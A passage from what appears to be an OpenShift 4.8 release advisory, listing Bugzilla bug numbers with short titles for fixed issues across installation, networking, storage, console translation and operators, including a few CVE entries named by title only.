1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters
1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys
1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages
1940499 - hybrid-overlay not logging properly before exiting due to an error
1940518 - Components in bare metal components lack resource requests
1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header
1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned
1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info
1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list
1940876 - Components in ovirt components lack resource requests
1940889 - Installation failures in OpenStack release jobs
1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown on v1beta1.metrics.k8s.io
1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP
1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster
1940950 - vsphere: client/bootstrap CSR double create
1940972 - vsphere: [4.6] CSR approval delayed for unknown reason
1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16.
1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy
1941342 - Add kata-osbuilder-generate.service as part of the default presets
1941456 - Multiple pods stuck in ContainerCreating status with the message "failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user" being seen in the journal log
1941526 - controller-manager-operator: Observed a panic: nil pointer dereference
1941592 - HAProxyDown not Firing
1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp
1941625 - Developer -> Topology - i18n misses
1941635 - Developer -> Monitoring - i18n misses
1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid
1941645 - Developer -> Builds - i18n misses
1941655 - Developer -> Pipelines - i18n misses
1941667 - Developer -> Project - i18n misses
1941669 - Developer -> ConfigMaps - i18n misses
1941759 - Errored pre-flight checks should not prevent install
1941798 - Some details pages don't have internationalized ResourceKind labels
1941801 - Many filter toolbar dropdowns haven't been internationalized
1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view
1941859 - [assisted operator] assisted pod deploy first time in error state
1941901 - Toleration merge logic does not account for multiple entries with the same key
1941915 - No validation against template name in boot source customization
1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description
1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8
1941990 - Pipeline metrics endpoint changed in osp-1.4
1941995 - fix backwards incompatible trigger api changes in osp1.4
1942086 - Administrator -> Home - i18n misses
1942117 - Administrator -> Workloads - i18n misses
1942125 - Administrator -> Serverless - i18n misses
1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup)
1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail
1942271 - Insights operator doesn't gather pod information from openshift-cluster-version
1942375 - CRI-O failing with error "reserving ctr name"
1942395 - The status is always "Updating" on dc detail page after deployment has failed.
1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied
1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate
1942536 - Corrupted image preventing containers from starting
1942548 - Administrator -> Networking - i18n misses
1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic
1942555 - Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork
1942557 - Query is reporting "no datapoint" when label cluster="" is set but work when the label is removed or when running directly in Prometheus
1942608 - crictl cannot list the images with an error: error locating item named "manifest" for image with ID
1942614 - Administrator -> Storage - i18n misses
1942641 - Administrator -> Builds - i18n misses
1942673 - Administrator -> Pipelines - i18n misses
1942694 - Resource names with a colon do not display property in the browser window title
1942715 - Administrator -> User Management - i18n misses
1942716 - Quay Container Security operator has Medium <-> Low colors reversed
1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8]
1942736 - Administrator -> Administration - i18n misses
1942749 - Install Operator form should use info icon for popovers
1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls
1942839 - Windows VMs fail to start on air-gapped environments
1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set
1942858 - [RFE]Confusing detach volume UX
1942883 - AWS EBS CSI driver does not support partitions
1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy
1942935 - must-gather improvements
1943145 - vsphere: client/bootstrap CSR double create
1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2)
1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl()
1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked
1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest
1943238 - The conditions table does not occupy 100% of the width.
1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane
1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB.
1943315 - avoid workload disruption for ICSP changes
1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes
1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest
1943356 - Dynamic plugins surfaced in the UI should be referred to as "Console plugins"
1943539 - crio-wipe is failing to start "Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container"
1943543 - DeploymentConfig Rollback doesn't reset params correctly
1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement
1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds
1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage
1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn
1943649 - don't use hello-openshift for network-check-target
1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress
1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions
1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB
1943845 - Router pods should have startup probes configured
1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors
1944160 - CNO: nbctl daemon should log reconnection info
1944180 - OVN-Kube Master does not release election lock on shutdown
1944246 - Ironic fails to inspect and move node to "manageable' but get bmh remains in "inspecting"
1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region
1944509 - Translatable texts without context in ssh expose component
1944581 - oc project not works with cluster proxy
1944587 - VPA could not take actions based on the recommendation when min-replicas=1
1944590 - The field name "VolumeSnapshotContent" is wrong on VolumeSnapshotContent detail page
1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI
1944631 - openshif authenticator should not accept non-hashed tokens
1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with ".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock"
1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures
1944674 - Project field become to "All projects" and disabled in "Review and create virtual machine" step in devconsole
1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods
1944761 - field level help instances do not use common util component
1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present
1944763 - field level help instances do not use common util component
1944853 - Update to nodejs >=14.15.4 for ARM
1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts
1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation
1945027 - Button 'Copy SSH Command' does not work
1945085 - Bring back API data in etcd test
1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled
1945103 - 'User credentials' shows even the VM is not running
1945104 - In k8s 1.21 bump '[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume' tests are disabled
1945146 - Remove pipeline Tech preview badge for pipelines GA operator
1945236 - Bootstrap ignition shim doesn't follow proxy settings
1945261 - Operator dependency not consistently chosen from default channel
1945312 - project deletion does not reset UI project context
1945326 - console-operator: does not check route health periodically
1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules
1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly
1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message
1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service
1945548 - catalog resource update failed if spec.secrets set to ""
1945584 - Elasticsearch operator fails to install on 4.8 cluster on ppc64le/s390x
1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION
1945630 - Pod log filename no longer in -.log format
1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin
1945646 - gcp-routes.sh running as initrc_t unnecessarily
1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret
1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry
1945687 - Dockerfile needs updating to new container CI registry
1945700 - Syncing boot mode after changing device should be restricted to Supermicro
1945816 - " Ingresses " should be kept in English for Chinese
1945818 - Chinese translation issues: Operator should be the same with English Operators
1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out
1945910 - [aws] support byo iam roles for instances
1945948 - SNO: pods can't reach ingress when the ingress uses a different IPv6.
1946079 - Virtual master is not getting an IP address
1946097 - [oVirt] oVirt credentials secret contains unnecessary "ovirt_cafile"
1946119 - panic parsing install-config
1946243 - No relevant error when pg limit is reached in block pools page
1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image
1946320 - Incorrect error message in Deployment Attach Storage Page
1946449 - [e2e][automation] Fix cloud-init tests as UI changed
1946458 - Edit Application action overwrites Deployment envFrom values on save
1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI.
1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default
1946497 - local-storage-diskmaker pod logs "DeviceSymlinkExists" and "not symlinking, could not get lock: "
1946506 - [on-prem] mDNS plugin no longer needed
1946513 - honor use specified system reserved with auto node sizing
1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready
1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster
1946607 - etcd readinessProbe is not reflective of actual readiness
1946705 - Fix issues with "search" capability in the Topology Quick Add component
1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation
1946788 - Serial tests are broken because of router
1946790 - Marketplace operator flakes Available=False OperatorStarting during updates
1946838 - Copied CSVs show up as adopted components
1946839 - [Azure] While mirroring images to private registry throwing error: invalid character '<' looking for beginning of value
1946865 - no "namespace:kube_pod_container_resource_requests_cpu_cores:sum" and "namespace:kube_pod_container_resource_requests_memory_bytes:sum" metrics
1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken
1946922 - Ingress details page doesn't show referenced secret name and link
1946929 - the default dns operator's Progressing status is always True and cluster operator dns Progressing status is False
1947036 - "failed to create Matchbox client or connect" on e2e-metal jobs or metal clusters via cluster-bot
1947066 - machine-config-operator pod crashes when noProxy is *
1947067 - [Installer] Pick up upstream fix for installer console output
1947078 - Incorrect skipped status for conditional tasks in the pipeline run
1947080 - SNO IPv6 with 'temporary 60-day domain' option fails with IPv4 exception
1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install
1947164 - Print "Successfully pushed" even if the build push fails.
1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed.
1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48)
1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name's
1947360 - [vSphere csi driver operator] operator pod runs as “BestEffort” qosClass
1947371 - [vSphere csi driver operator] operator doesn't create “csidriver” instance
1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout
1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8)
1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot
1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8)
1947663 - disk details are not synced in web-console
1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin
1947684 - MCO on SNO sometimes has rendered configs and sometimes does not
1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals.
1947719 - 8 APIRemovedInNextReleaseInUse info alerts display
1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods
1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade
1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc?
1947771 - [kube-descheduler]descheduler operator pod should not run as “BestEffort” qosClass
1947774 - CSI driver operators use "Always" imagePullPolicy in some containers
1947775 - [vSphere csi driver operator] doesn’t use the downstream images from payload.
1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade
1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade
1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947789 - Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display
1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert
1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display
1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert
1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display
1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display
1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin
1947828 - download it link should save pod log in -.log format
1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel is changed
1947917 - Egress Firewall does not reliably apply firewall rules
1947946 - Operator upgrades can delete existing CSV before completion
1948011 - openshift-controller-manager constantly reporting type "Upgradeable" status Unknown
1948012 - service-ca constantly reporting type "Upgradeable" status Unknown
1948019 - [4.8] Large number of requests to the infrastructure cinder volume service
1948022 - Some on-prem namespaces missing from must-gather
1948040 - cluster-etcd-operator: etcd is using deprecated logger
1948082 - Monitoring should not set Available=False with no reason on updates
1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O.
1948232 - DNS operator performs spurious updates in response to API's defaulting of daemonset's maxSurge and service's ipFamilies and ipFamilyPolicy fields
1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later
1948359 - [aws] shared tag was not removed from user provided IAM role
1948410 - [LSO] Local Storage Operator uses imagePullPolicy as "Always"
1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn't take effective after changing
1948427 - No action is triggered after click 'Continue' button on 'Show community Operator' windows
1948431 - TechPreviewNoUpgrade does not enable CSI migration
1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node
1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge
1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial]
1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes
1948513 - get-resources.sh doesn't honor the no_proxy settings
1948524 - 'DeploymentUpdated' Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute
1948546 - VM of worker is in error state when a network has port_security_enabled=False
1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand
1948555 - A lot of events "rpc error: code = DeadlineExceeded desc = context deadline exceeded" were seen in azure disk csi driver verification test
1948563 - End-to-End Secure boot deployment fails "Invalid value for input variable"
1948582 - Need ability to specify local gateway mode in CNO config
1948585 - Need a CI jobs to test local gateway mode with bare metal
1948592 - [Cluster Network Operator] Missing Egress Router Controller
1948606 - DNS e2e test fails "[sig-arch] Only known images used by tests" because it does not use a known image
1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly]
1948626 - TestRouteAdmissionPolicy e2e test is failing often
1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI
1948634 - upgrades: allow upgrades without version change
1948640 - [Descheduler] operator log reports key failed with : kubedeschedulers.operator.openshift.io "cluster" not found
1948701 - unneeded CCO alert already covered by CVO
1948703 - p&f: probes should not get 429s
1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows bootstrap.ign was not found
1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile
1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile
1948711 - thanos querier and prometheus-adapter should have 2 replicas
1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile
1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile
1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector
1948719 - Machine API components should use 1.21 dependencies
1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile
1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed
1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing
1948771 - ~50% of GCP upgrade jobs in 4.8 failing with "AggregatedAPIDown" alert on packages.coreos.com
1948782 - Stale references to the single-node-production-edge cluster profile
1948787 - secret.StringData shouldn't be used for reads
1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer
1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page
1948919 - Need minor update in message on channel modal
1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region
1948926 - Memory Usage of Dashboard 'Kubernetes / Compute Resources / Pod' contain wrong CPU query
1948936 - [e2e][automation][prow] Prow script point to deleted resource
1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer
1948953 - Uninitialized cloud provider error when provisioning a cinder volume
1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages
1948966 - Add the ability to run a gather done by IO via a Kubernetes Job
1948981 - Align dependencies and libraries with latest ironic code
1948998 - style fixes by GoLand and golangci-lint
1948999 - Can not assign multiple EgressIPs to a namespace by using automatic way.
1949019 - PersistentVolumes page cannot sync project status automatically which will block user to create PV
1949022 - Openshift 4 has a zombie problem
1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil
1949041 - vsphere: wrong image names in bundle
1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests (on OpenStack)
1949050 - Bump k8s to latest 1.21
1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv in the case of invalid NMStateConfig
1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service
1949075 - Extend openshift/api for Add card customization
1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues
1949096 - Restore private git clone tests
1949099 - network-check-target code cleanup
1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol
1949145 - Move openshift-user-critical priority class to CCO
1949155 - Console doesn't correctly check for favorited or last namespace on load if project picker used
1949180 - Pipelines plugin model kinds aren't picked up by parser
1949202 - sriov-network-operator not available from operatorhub on ppc64le
1949218 - ccoctl not included in container image
1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs
1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors
1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate
1949306 - need a way to see top API accessors
1949313 - Rename vmware-vsphere- images to vsphere- images before 4.8 ships
1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring
1949347 - apiserver-watcher support for dual-stack
1949357 - manila-csi-controller pod not running due to secret lack(in another ns)
1949361 - CoreDNS resolution failure for external hostnames with "A: dns: overflow unpacking uint16"
1949364 - Mention scheduling profiles in scheduler operator repository
1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error
1949384 - Edit Default Pull Secret modal - i18n misses
1949387 - Fix the typo in auto node sizing script
1949404 - label selector on pvc creation page - i18n misses
1949410 - The referred role doesn't exist if create rolebinding from rolebinding tab of role page
1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotConent Details tab is not translated - i18n misses
1949413 - Automatic boot order setting is done incorrectly when using by-path style device names
1949418 - Controller factory workers should always restart on panic()
1949419 - oauth-apiserver logs "[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)"
1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are processed not the same as in-tree plugin
1949435 - ingressclass controller doesn't recreate the openshift-default ingressclass after deleting it
1949480 - Listeners timeout are constantly being updated
1949481 - cluster-samples-operator restarts approximately two times per day and logs too many same messages
1949509 - Kuryr should manage API LB instead of CNO
1949514 - URL is not visible for routes at narrow screen widths
1949554 - Metrics of vSphere CSI driver sidecars are not collected
1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals"
1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing
1949591 - Alert does not catch removed api usage during end-to-end tests.
1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse
1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command 'du'
1949626 - machine-api fails to create AWS client in new regions
1949661 - Kubelet Workloads Management changes for OCPNODE-529
1949664 - Spurious keepalived liveness probe failures
1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot
1949677 - multus is the first pod on a new node and the last to go ready
1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace
1949721 - Pick 99237: Use the audit ID of a request for better correlation
1949741 - Bump golang version of cluster-machine-approver
1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceed 64
1949810 - OKD 4.7 unable to access Project Topology View
1949818 - Add e2e test to perform MCO operation Single Node OpenShift
1949820 - Unable to use oc adm top is shortcut when asking for imagestreams
1949862 - The ccoctl tool hits the panic sometime when running the delete subcommand
1949866 - The ccoctl fails to create authentication file when running the command ccoctl aws create-identity-provider with --output-dir parameter
1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn't work
1949882 - service-idler build error
1949898 - Backport RP#848 to OCP 4.8
1949907 - Gather summary of PodNetworkConnectivityChecks
1949923 - some defined rootVolumes zones not used on installation
1949928 - Samples Operator updates break CI tests
1949935 - Fix incorrect access review check on start pipeline kebab action
1949956 - kaso: add minreadyseconds to ensure we don't have an LB outage on kas
1949967 - Update Kube dependencies in MCO to 1.21
1949972 - Descheduler metrics: populate build info data and make the metrics entries more readeable
1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal]
1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name
1949991 - openshift-marketplace pods are crashlooping
1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image
1950026 - [Descheduler] Need better way to handle evicted pod count for removeDuplicate pod strategy
1950047 - CSV deployment template custom annotations are not propagated to deployments
1950112 - SNO: machine-config pool is degraded: error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791
1950113 - in-cluster operators need an API for additional AWS tags
1950133 - MCO creates empty conditions on the kubeletconfig object
1950159 - Downstream ovn-kubernetes repo should have no linter errors
1950175 - Update Jenkins and agent base image to Go 1.16
1950196 - ssh Key is added even with 'Expose SSH access to this virtual machine' unchecked
1950210 - VPA CRDs use deprecated API version
1950219 - KnativeServing is not shown in list on global config page
1950232 - [Descheduler] - The minKubeVersion should be 1.21
1950236 - Update OKD imagestreams to prefer centos7 images
1950270 - should use "kubernetes.io/os" in the dns/ingresscontroller node selector description when executing oc explain command
1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers
1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network
1950379 - oauth-server is in pending/crashbackoff at beginning 50% of CI runs
1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build perm failing
1950409 - Descheduler operator code and docs still reference v1beta1
1950417 - The Marketplace Operator is building with EOL k8s versions
1950430 - CVO serves metrics over HTTP, despite a lack of consumers
1950460 - RFE: Change Request Size Input to Number Spinner Input
1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap
1950532 - Include "update" when referring to operator approval and channel
1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift)
1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff
1950653 - BuildConfig ignores Args
1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node
1950908 - kube_pod_labels metric does not contain k8s labels
1950912 - [e2e][automation] add devconsole tests
1950916 - [RFE]console page show error when vm is poused
1950934 - Unnecessary rollouts can happen due to unsorted endpoints
1950935 - Updating cluster-network-operator builder & base images to be consistent with ART
1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller
1951007 - ovn master pod crashed
1951029 - Drainer panics on missing context for node patch
1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts
1951042 - Panics every few minutes in kubelet logs post-rebase
1951043 - Start Pipeline Modal Parameters should accept empty string defaults
1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests
1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud
1951084 - avoid benign "Path \"/run/secrets/etc-pki-entitlement\" from \"/etc/containers/mounts.conf\" doesn't exist, skipping" messages
1951158 - Egress Router CRD missing Addresses entry
1951169 - Improve API Explorer discoverability from the Console
1951174 - re-pin libvirt to 6.0.0
1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd's size limit
1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI
1951212 - User/Group details shows unrelated subjects in role bindings tab
1951214 - VM list page crashes when the volume type is sysprep
1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions
1951387 - opm index add doesn't respect deprecated bundles
1951412 - Configmap gatherer can fail incorrectly
1951456 - Docs and linting fixes
1951486 - Replace "kubevirt_vmi_network_traffic_bytes_total" with new metrics names
1951505 - Remove deprecated techPreviewUserWorkload field from CMO's configmap
1951558 - Backport Upstream 101093 for Startup Probe Fix
1951585 - enterprise-pod fails to build
1951636 - assisted service operator use default serviceaccount in operator bundle
1951637 - don't rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes
1951639 - Bootstrap API server unclean shutdown causes reconcile delay
1951646 - Unexpected memory climb while container not in use
1951652 - Add retries to opm index add
1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit
1951671 - Excessive writes to ironic Nodes
1951705 - kube-apiserver needs alerts on CPU utlization
utlization 1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can't find created instance 1951853 - dnses.operator.openshift.io resource's spec.nodePlacement.tolerations godoc incorrectly describes default behavior 1951858 - unexpected text '0' on filter toolbar on RoleBinding tab 1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator 1951870 - sriov network resources injector: user defined injection removed existing pod annotations 1951891 - [migration] cannot change ClusterNetwork CIDR during migration 1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost 1952001 - Delegated authentication: reduce the number of watch requests 1952032 - malformatted assets in CMO 1952045 - Mirror nfs-server image used in jenkins-e2e 1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1952079 - rebase openshift/sdn to kube 1.21 1952111 - Optimize importing from @patternfly/react-tokens 1952174 - DNS operator claims to be done upgrading before it even starts 1952179 - OpenStack Provider Ports UI Underscore Variables 1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID "SomeLongID" already exists, but uses a different top layer: that ID 1952211 - cascading mounts happening exponentially on when deleting openstack-cinder-csi-driver-node pods 1952214 - Console Devfile Import Dev Preview broken 1952238 - Catalog pods don't report termination logs to catalog-operator 1952262 - Need support external gateway via hybrid overlay 1952266 - etcd operator bumps status.version[name=operator] before operands update 1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots 1952282 - CSR approver races with nodelink controller and does not requeue 1952310 - VM cannot start up if the ssh key is added by another template 1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport 1952333 - openshift/kubernetes vulnerable to CVE-2021-3121 1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations 1952367 - No VM status on overview page when VM is pending 1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1952372 - VM stop action should not be there if the VM is not running 1952405 - console-operator is not reporting correct Available status 1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped 1952460 - In k8s 1.21 bump '[sig-network] Firewall rule control plane should not expose well-known ports' test is disabled 1952473 - Monitor pod placement during upgrades 1952487 - Template filter does not work properly 1952495 - “Create” button on the Templates page is confuse 1952527 - 